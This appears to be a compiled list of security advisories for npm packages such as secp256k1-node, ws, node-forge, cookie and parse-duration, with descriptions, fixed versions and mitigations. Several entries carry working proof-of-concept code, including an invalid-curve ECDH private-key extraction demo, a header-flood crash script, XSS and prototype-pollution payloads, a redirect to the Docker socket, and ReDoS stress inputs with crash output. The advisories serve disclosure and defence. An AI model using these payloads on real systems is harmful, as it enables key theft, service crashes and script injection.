All the vulnerabilities related to version 0.1.4 of the package
secp256k1-node allows private key extraction over ECDH
In the elliptic-based version, loadUncompressedPublicKey has a check that the public key is on the curve: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L37-L39
loadCompressedPublicKey is, however, missing that check: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L17-L19
That allows an attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as few as 11 ECDH sessions, at very low computational cost
Other operations on public keys are also affected: publicKeyVerify() incorrectly returns true on those invalid keys, and publicKeyTweakMul() likewise returns predictable outcomes, allowing recovery of the tweak
The curve equation is Y^2 = X^3 + 7, and loadCompressedPublicKey restores Y from X using Y = sqrt(X^3 + 7). When no valid Y satisfies Y^2 = X^3 + 7 for a given X, the same code instead calculates a solution for -Y^2 = X^3 + 7. That solution also satisfies some other equation Y^2 = X^3 + D, where D is not equal to 7 and might correspond to a curve with factorizable cardinality, so (X,Y) might be a low-order point on that curve, lowering the number of possible ECDH output values to a brute-forceable set
Those output values correspond to remainders of the private key modulo the orders of the chosen points, which can then be combined via the Chinese remainder theorem to restore the original value
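To illustrate that recombination step, here is a minimal sketch in JavaScript BigInt arithmetic (the moduli and remainders below are made-up toy values, not the point orders from the actual attack):

// Extended Euclidean algorithm; assumes gcd(a, m) === 1
function modInverse(a, m) {
  let oldR = a % m, r = m;
  let oldS = 1n, s = 0n;
  while (r !== 0n) {
    const q = oldR / r;
    [oldR, r] = [r, oldR - q * r];
    [oldS, s] = [s, oldS - q * s];
  }
  return ((oldS % m) + m) % m;
}

// Combine x ≡ remainders[i] (mod moduli[i]) into x mod (product of all moduli)
function crt(remainders, moduli) {
  const M = moduli.reduce((a, b) => a * b, 1n);
  let x = 0n;
  for (let i = 0; i < moduli.length; i++) {
    const Mi = M / moduli[i];
    x += remainders[i] * Mi * modInverse(Mi, moduli[i]);
  }
  return x % M;
}

// x ≡ 3 (mod 5), x ≡ 4 (mod 7), x ≡ 2 (mod 11) => x = 123
console.log(crt([3n, 4n, 2n], [5n, 7n, 11n])); // 123n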
Endomorphism-based multiplication only slightly hinders restoration and does not affect the fact that the result is low-order
10 different malicious X values can be chosen so that the overall extracted information is 238.4 bits of the 256-bit private key, and the rest is trivially brute-forceable with an additional 11th public key (which may be valid or invalid -- not significant)
The attacker does not need to receive the ECDH value; they only need to be able to confirm it against a list of possible candidates, e.g. by checking whether deciphering a block/stream cipher with it works -- and all of that can be done locally on the attacker's side
This key has order 39. One of the possible outcomes for it is a throw; the other 38 are predictable ECDH values. Keys used in the full attack have higher orders (starting from ~20000), so they are very unlikely to cause an error:
import secp256k1 from 'secp256k1/elliptic.js'
import { randomBytes } from 'crypto'
const pub = Buffer.from('028ac57f9c6399282773c116ef21f7394890b6140aa6f25c181e9a91e2a9e3da45', 'hex')
const seen = new Set()
for (let i = 0; i < 1000; i++) {
  try {
    seen.add(Buffer.from(secp256k1.ecdh(pub, randomBytes(32))).toString('hex'))
  } catch {
    seen.add('failure also is an outcome')
  }
}
console.log(seen.size) // 39
This PoC intentionally doesn't list the exact public keys or the code for solver.js, but this exact code works on arbitrary random private keys:
// Only the elliptic version is affected, gyp one isn't
// Node.js can use both, Web/RN/bundles always use the elliptic version
import secp256k1 from 'secp256k1/elliptic.js'
import { randomBytes } from 'node:crypto'
import assert from 'node:assert/strict'
import { Solver } from './solver.js'
const privateKey = randomBytes(32)
// The full dataset is precomputed on a single MacBook Air in a few days and can be reused for any private key
const solver = new Solver()
// We need to run on 10 specially crafted public keys for this
// Lower than 10 is possible but requires more compute
for (let i = 0; i < 10; i++) {
  const letMeIn = solver.ping() // this is a normal 33-byte Uint8Array, a 02/03-prefixed compressed public key
  assert(letMeIn instanceof Uint8Array) // true
  assert(secp256k1.publicKeyVerify(letMeIn)) // true
  // Returning the ecdh value is not necessary but is used in this demo for simplicity
  // Solver needs to _confirm_ an ecdh value against a set of precalculated known ones,
  // which can be done even after it's hashed or used e.g. for a stream/block cipher, based on the encrypted data
  solver.callback(secp256k1.ecdh(letMeIn, privateKey))
  // Btw, we have those values precomputed, so we can use these sessions to lower suspicion -- most of them resolve instantly
}
// Now, we need a single valid (or another invalid) public key to recheck things against
// It can be anything, e.g. we can specify an 11th one, or create a valid one and use it
// We'll be able to confirm/restore and use the ecdh value for this session too upon privateKey extraction
const anyPublicKey = secp256k1.publicKeyCreate(randomBytes(32))
assert(secp256k1.publicKeyVerify(anyPublicKey)) // true (obviously)
// Full complexity of this exploit requires solver to perform ~ 2^35 ecdh value checks (for all 10 keys combined),
// which is ~ 1 TiB -- that can be done offline and does not require any further interaction with the target
// The exact speed of the comparison step depends on how the ecdh values are used, but is not very significant
// Direct non-indexed linear scan over all possible (precomputed) values takes <10 minutes on a MacBook Air
// Confirming against e.g. cipher output would be somewhat slower, but still definitely possible + also could be precomputed
const extracted = solver.stab(anyPublicKey, secp256k1.ecdh(anyPublicKey, privateKey))
console.log(`Extracted private key: ${extracted.toString('hex')}`)
console.log(`Actual private key was: ${privateKey.toString('hex')}`)
assert(extracted.toString('hex') === privateKey.toString('hex'))
console.log('Oops')
Result:
Extracted private key: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3d
Actual private key was: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3d
Oops
node example.js 178.80s user 13.59s system 74% cpu 4:17.01 total
Remote private key is extracted over 11 ECDH sessions
The attack is very low-cost, precompute took a few days on a single MacBook Air, and extraction takes ~10 minutes on the same MacBook Air
Also:
publicKeyVerify() misreports malicious public keys as valid
publicKeyTweakMul() result and other public key operations are also affected

ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;
    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';
  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });
  request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin
Versions of jsondiffpatch prior to 0.7.2 are vulnerable to Cross-site Scripting (XSS) in the HtmlFormatter (HtmlFormatter::nodeBegin). When diffs are rendered to HTML using the built-in formatter, untrusted payloads can inject scripts and execute in the context of a consuming web page.
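As a rough illustration -- a minimal sketch assuming the library's documented diff() and formatters.html.format() API, with a hypothetical payload -- an attacker-controlled string ends up in the formatter's generated markup:

const jsondiffpatch = require('jsondiffpatch');

const left = { name: 'alice' };
// untrusted input containing an XSS payload
const right = { name: "<img src=x onerror=alert(1)>" };

const delta = jsondiffpatch.diff(left, right);
// Before 0.7.2, the HTML formatter did not escape such values, so inserting
// the returned markup into a page executes the attacker's script
const html = jsondiffpatch.formatters.html.format(delta, left);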
Affected versions: >= 0, < 0.7.2
Patched version: 0.7.2
Remediation
Upgrade to jsondiffpatch 0.7.2 or later. The fix hardens the HTML formatter to avoid script injection.
Workarounds
Avoid using the HTML formatter on untrusted diffs, or sanitize/escape the rendered output.
Improper Verification of Cryptographic Signature in node-forge
RSA PKCS#1 v1.5 signature verification code is not properly checking DigestInfo for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest.
The issue has been addressed in node-forge 1.3.0.
node-forge has ASN.1 Unbounded Recursion
An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.
An ASN.1 Denial of Service (DoS) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs, which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.
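A minimal sketch of such an input, assuming the documented asn1.fromDer entry point (the nesting depth of 50,000 is an arbitrary illustrative choice):

const forge = require('node-forge');

// minimal DER length encoding (definite form)
function encodeLength(len) {
  if (len < 0x80) return Buffer.from([len]);
  const bytes = [];
  while (len > 0) { bytes.unshift(len & 0xff); len >>>= 8; }
  return Buffer.from([0x80 | bytes.length, ...bytes]);
}

// wrap an empty value in ~50,000 constructed SEQUENCE TLVs (tag 0x30)
let der = Buffer.alloc(0);
for (let i = 0; i < 50000; i++) {
  der = Buffer.concat([Buffer.from([0x30]), encodeLength(der.length), der]);
}

// On vulnerable versions this throws RangeError: Maximum call stack size exceeded
forge.asn1.fromDer(der.toString('binary'));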
This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.
This vulnerability impacts the asn1.fromDer function in node-forge before patched version 1.3.2.
Any downstream application using this component is impacted. This component may be leveraged by downstream applications in ways that enable full compromise of availability.
node-forge has an Interpretation Conflict vulnerability via its ASN.1 Validator Desynchronization
CVE-2025-12816 has been reserved by CERT/CC
Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.
A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.
This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).
This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.
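For context, forge locates fields by walking static validator schemas. The toy schema below is hypothetical (only the field names follow forge's documented validator format) and just shows the kind of optional boundary such an attack targets:

const forge = require('node-forge');

// a toy validator: an optional SEQUENCE followed by a mandatory one;
// the desynchronization causes a malformed optional element to be
// consumed as if it were the mandatory 'payload' that follows it
const toySchema = {
  name: 'Outer',
  tagClass: forge.asn1.Class.UNIVERSAL,
  type: forge.asn1.Type.SEQUENCE,
  constructed: true,
  value: [{
    name: 'maybeMac',
    tagClass: forge.asn1.Class.UNIVERSAL,
    type: forge.asn1.Type.SEQUENCE,
    constructed: true,
    optional: true
  }, {
    name: 'payload',
    tagClass: forge.asn1.Class.UNIVERSAL,
    type: forge.asn1.Type.SEQUENCE,
    constructed: true,
    capture: 'payload'
  }]
};

// usage: forge.asn1.validate(parsedAsn1, toySchema, capture, errors)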
This vulnerability impacts the asn1.validate function in node-forge before patched version 1.3.2.
https://github.com/digitalbazaar/forge/blob/main/lib/asn1.js.
The following components in node-forge are impacted.
lib/asn1.js
lib/x509.js
lib/pkcs12.js
lib/pkcs7.js
lib/rsa.js
lib/pbe.js
lib/ed25519.js
Any downstream application using these components is impacted.
These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.
Prototype Pollution in node-forge debug API.
The forge.debug API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and never documented or advertised. It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.
The forge.debug API and related functions were removed in 1.0.0.
Don't use the forge.debug API directly or indirectly with untrusted input.
node-forge is vulnerable to ASN.1 OID Integer Truncation
MITRE-Formatted CVE Description
An Integer Overflow (CWE-190) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures containing OIDs with oversized arcs. These arcs may be decoded as smaller, trusted OIDs due to 32-bit bitwise truncation, enabling the bypass of downstream OID-based security decisions.
An ASN.1 OID Integer Truncation vulnerability exists in the node-forge asn1.derToOid function within forge/lib/asn1.js. OID components are decoded using JavaScript's bitwise left-shift operator (<<), which forcibly casts values to 32-bit signed integers. Consequently, if an attacker provides a mathematically unique, very large OID arc integer exceeding 2^31 - 1, the value silently overflows and wraps around rather than throwing an error.
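A minimal sketch of the decoding pattern -- a hypothetical decodeArc helper mirroring the shift-based loop, not the library's exact code -- shows the wraparound:

// base-128 decoding of a single OID arc, where << truncates to 32-bit signed ints
function decodeArc(bytes) {
  let value = 0;
  for (const b of bytes) {
    value = (value << 7) | (b & 0x7f); // silently wraps past 2^31 - 1
  }
  return value;
}

// The arc 2^32 (DER bytes 0x90 0x80 0x80 0x80 0x00) decodes as 0, not 4294967296:
console.log(decodeArc([0x90, 0x80, 0x80, 0x80, 0x00])); // 0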
This vulnerability allows a specially crafted ASN.1 object to spoof an OID, where a malicious certificate with a massive, invalid OID is misinterpreted by the library as a trusted, standard OID, potentially bypassing security controls.
This vulnerability impacts the asn1.derToOid function in node-forge before patched version 1.3.2.
Any downstream application using this component is impacted. This component may be leveraged by downstream applications in ways that enable partial compromise of integrity, leading to potential availability and confidentiality compromises.
Open Redirect in node-forge
parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path.
Prototype Pollution in node-forge
The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: version 0.10.0 is a breaking change removing the vulnerable functions.
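A minimal sketch of the pollution pattern (mirroring the publicly known proof of concept for this advisory; applicable only before 0.10.0, where util.setPath still existed):

const forge = require('node-forge');

// the keys path traverses __proto__, polluting Object.prototype on vulnerable versions
forge.util.setPath({}, ['__proto__', 'polluted'], true);
console.log({}.polluted); // true on vulnerable versions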
Improper Verification of Cryptographic Signature in node-forge
RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used.
The issue has been addressed in node-forge 1.3.0.
For more information, please see "Bleichenbacher's RSA signature forgery based on implementation error" by Hal Finney.
URL parsing in node-forge could lead to undesired behavior.
The regex used for the forge.util.parseUrl API would not properly parse certain inputs resulting in a parsed data structure that could lead to undesired behavior.
forge.util.parseUrl and other very old related URL APIs were removed in 1.0.0 in favor of letting applications use the more modern WHATWG URL Standard API.
Ensure code does not directly or indirectly call forge.util.parseUrl with untrusted input.
Prototype Pollution in node-forge util.setPath API
forge.util.setPath had a potential prototype pollution issue if called with untrusted keys. This API was not used by forge itself.
The forge.util.setPath API and related functions were removed in 0.10.0.
Don't call forge.util.setPath directly or indirectly with untrusted keys.
Improper Verification of Cryptographic Signature in node-forge
RSA PKCS#1 v1.5 signature verification code does not check for trailing garbage bytes after decoding a DigestInfo ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.
The issue has been addressed in node-forge 1.3.0.
For more information, please see "Bleichenbacher's RSA signature forgery based on implementation error" by Hal Finney.
libp2p DoS vulnerability from lack of resource management
Versions older than v0.38.0 of js-libp2p are vulnerable to targeted resource exhaustion attacks. These attacks target libp2p’s connection, stream, peer, and memory management. An attacker can cause the allocation of large amounts of memory, ultimately leading to the process getting killed by the host’s operating system. While a connection manager tasked with keeping the number of connections within manageable limits has been part of js-libp2p, this component was designed to handle the regular churn of peers, not a targeted resource exhaustion attack.
Update your js-libp2p dependency to v0.38.0 or greater.
There are no workarounds, so we recommend upgrading your js-libp2p version. Some range of attacks can be mitigated using OS tools (like manually blocking malicious peers using iptables or ufw) or by making use of a load balancer in front of libp2p nodes. You can also use the allow/deny list in js-libp2p to deny specific peers.
However, these require direct action and responsibility on your part and are no substitute for upgrading js-libp2p. We therefore highly recommend upgrading your js-libp2p version, as it enables tighter scoped limits and provides visibility into, and easier reasoning about, js-libp2p resource utilization.
Please see the related disclosure for go-libp2p: https://github.com/libp2p/go-libp2p/security/advisories/GHSA-j7qp-mfxf-8xjw and rust-libp2p: https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-jvgw-gccv-q5p8
If you have any questions or comments about this advisory, please email us at security@libp2p.io.
private-ip vulnerable to Server-Side Request Forgery
All versions of the package private-ip are vulnerable to Server-Side Request Forgery (SSRF), where an attacker can provide an IP or hostname that resolves to a multicast IP address (224.0.0.0/4) which is not included as part of the private IP ranges in the package's source code.
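A minimal sketch of the bypass, assuming the package's documented boolean-returning default export:

const isPrivateIp = require('private-ip');

console.log(isPrivateIp('10.0.0.1'));  // true -- RFC 1918 ranges are caught
console.log(isPrivateIp('224.0.0.1')); // false -- multicast (224.0.0.0/4) is
                                       // missing from the ranges, so an SSRF
                                       // guard built on this check lets it through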
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
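A minimal sketch of the injection, reusing the advisory's own example payload with the cookie package's serialize() API:

const cookie = require('cookie');

// the attacker-controlled "name" smuggles extra cookie fields through serialize()
const out = cookie.serialize(
  "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a",
  'test'
);
console.log(out);
// userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test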
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields; ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
const parseuri = require("parse-uri");

// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
// parse-uri is synchronous; on vulnerable versions this call hangs the event loop
const result = parseuri(craftedInput);
Got allows a redirect to a UNIX socket
The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.
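A minimal sketch of the attack shape, assuming got's documented http://unix:SOCKET:PATH URL support (the Docker socket path is just an illustrative target):

const http = require('http');

// a malicious or compromised server redirects the client into a local socket
const server = http.createServer((req, res) => {
  res.writeHead(302, {
    Location: 'http://unix:/var/run/docker.sock:/containers/json'
  });
  res.end();
});

server.listen(8080);
// A vulnerable got follows the redirect and issues the request over the
// local UNIX socket:
//   const got = require('got');
//   await got('http://localhost:8080/');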
parse-duration has a Regex Denial of Service that results in event loop delay and out of memory
This report finds 2 availability issues due to the regex used in the parse-duration npm package: an event loop delay on moderately sized inputs, and an out-of-memory crash on larger ones.
Refer to the following proof of concept code that provides a test case and makes use of the regular expression in the library as its test case to match against strings:
// Vulnerable regex to use from the library:
import parse from './index.js'
function generateStressTestString(length, decimalProbability) {
  let result = "";
  for (let i = 0; i < length; i++) {
    if (Math.random() < decimalProbability) {
      result += "....".repeat(99);
    }
    result += Math.floor(Math.random() * 10);
  }
  return result;
}

function getStringSizeInMB_UTF8(str) {
  const sizeInBytes = Buffer.byteLength(str, 'utf8');
  const sizeInMB = sizeInBytes / (1024 * 1024);
  return sizeInMB;
}
// Generate test strings with varying length and decimal probability:
const longString1 = generateStressTestString(380, 0.05);
const longString2 = generateStressTestString(10000, 0.9);
const longString3 = generateStressTestString(500000, 1);
const longStringVar1 = '-1e' + '-----'.repeat(915000)
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(5225000)
function testRegex(str) {
  const startTime = performance.now();
  // one of the regexes used in the library:
  // const durationRE = /(-?(?:\d+\.?\d*|\d*\.?\d+)(?:e[-+]?\d+)?)\s*([\p{L}]*)/giu;
  // const match = durationRE.test(str);
  // but we will use the exported library code directly:
  const match = parse(str);
  const endTime = performance.now();
  const timeTaken = endTime - startTime;
  return { timeTaken, match };
}
// Test the long strings:
let result = {}
{
  console.log(
    `\nRegex test on string of length ${longString1.length} (size: ${getStringSizeInMB_UTF8(longString1).toFixed(2)} MB):`
  );
  result = testRegex(longString1);
  console.log(` matched: ${result.match}, time taken: ${result.timeTaken}ms`);
}
{
  console.log(
    `\nRegex test on string of length ${longString2.length} (size: ${getStringSizeInMB_UTF8(longString2).toFixed(2)} MB):`
  );
  result = testRegex(longString2 + "....".repeat(100) + "5сек".repeat(9000));
  console.log(` matched: ${result.match}, time taken: ${result.timeTaken}ms`);
}
{
  console.log(
    `\nRegex test on string of length ${longStringVar1.length} (size: ${getStringSizeInMB_UTF8(longStringVar1).toFixed(2)} MB):`
  );
  result = testRegex(longStringVar1);
  console.log(` matched: ${result.match}, time taken: ${result.timeTaken}ms`);
}
{
  console.log(
    `\nRegex test on string of length ${longString3.length} (size: ${getStringSizeInMB_UTF8(longString3).toFixed(2)} MB):`
  );
  result = testRegex(longString3 + '.'.repeat(10000) + " 5сек".repeat(9000));
  console.log(` matched: ${result.match}, time taken: ${result.timeTaken}ms`);
}
{
  console.log(
    `\nRegex test on string of length ${longStringVar2.length} (size: ${getStringSizeInMB_UTF8(longStringVar2).toFixed(2)} MB):`
  );
  result = testRegex(longStringVar2);
  console.log(` matched: ${result.match}, time taken: ${result.timeTaken}ms`);
}
The results of this on the cloud machine that I ran this on are as follows:
@lirantal ➜ /workspaces/parse-duration (master) $ node redos.js
Regex test on string of length 6320 (size: 0.01 MB):
matched: 5997140778.000855, time taken: 0.9271340000000237ms
Regex test on string of length 3561724 (size: 3.40 MB):
matched: 0.0006004999999999999, time taken: 728.7693149999999ms
Regex test on string of length 4575003 (size: 4.36 MB):
matched: null, time taken: 43.713984999999866ms
Regex test on string of length 198500000 (size: 189.30 MB):
<--- Last few GCs --->
[34339:0x7686430] 14670 ms: Mark-Compact (reduce) 2047.4 (2073.3) -> 2047.4 (2074.3) MB, 1396.70 / 0.01 ms (+ 0.1 ms in 62 steps since start of marking, biggest step 0.0 ms, walltime since start of marking 1430 ms) (average mu = 0.412, current mu = 0.
[34339:0x7686430] 17450 ms: Mark-Compact (reduce) 2048.4 (2074.3) -> 2048.4 (2075.3) MB, 2777.68 / 0.00 ms (average mu = 0.185, current mu = 0.001) allocation failure; scavenge might not succeed
<--- JS stacktrace --->
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
----- Native stack trace -----
1: 0xb8d0a3 node::OOMErrorHandler(char const*, v8::OOMDetails const&) [node]
2: 0xf06250 v8::Utils::ReportOOMFailure(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [node]
3: 0xf06537 v8::internal::V8::FatalProcessOutOfMemory(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [node]
4: 0x11180d5 [node]
5: 0x112ff58 v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollectionReason, v8::GCCallbackFlags) [node]
6: 0x1106071 v8::internal::HeapAllocator::AllocateRawWithLightRetrySlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [node]
7: 0x1107205 v8::internal::HeapAllocator::AllocateRawWithRetryOrFailSlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [node]
8: 0x10e4856 v8::internal::Factory::NewFillerObject(int, v8::internal::AllocationAlignment, v8::internal::AllocationType, v8::internal::AllocationOrigin) [node]
9: 0x1540686 v8::internal::Runtime_AllocateInYoungGeneration(int, unsigned long*, v8::internal::Isolate*) [node]
10: 0x1979ef6 [node]
Aborted (core dumped)
You can note that:
- moderately sized inputs already cause a significant event loop delay in the parse() function
- sufficiently large inputs crash the process with an out-of-memory error

However, more interestingly, if we focus on the input string case:
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(5225000)
Even though this is merely 10 MB in size (9.97 MB), it results in a crash due to the recursive nature of the regular expression matching:
Regex test on string of length 5225503 (size: 9.97 MB):
file:///workspaces/parse-duration/index.js:21
.replace(durationRE, (_, n, units) => {
^
RangeError: Maximum call stack size exceeded
at String.replace (<anonymous>)
at parse (file:///workspaces/parse-duration/index.js:21:6)
at testRegex (file:///workspaces/parse-duration/redos.js:35:17)
at file:///workspaces/parse-duration/redos.js:89:12
at ModuleJob.run (node:internal/modules/esm/module_job:234:25)
at async ModuleLoader.import (node:internal/modules/esm/loader:473:24)
at async asyncRunEntryPointWithESMLoader (node:internal/modules/run_main:122:5)
Node.js v20.18.1
Note that the issue at hand may not be just the primary regex in use, but also the parse() function's reliance on multiple replace calls, which create copies of the input in memory.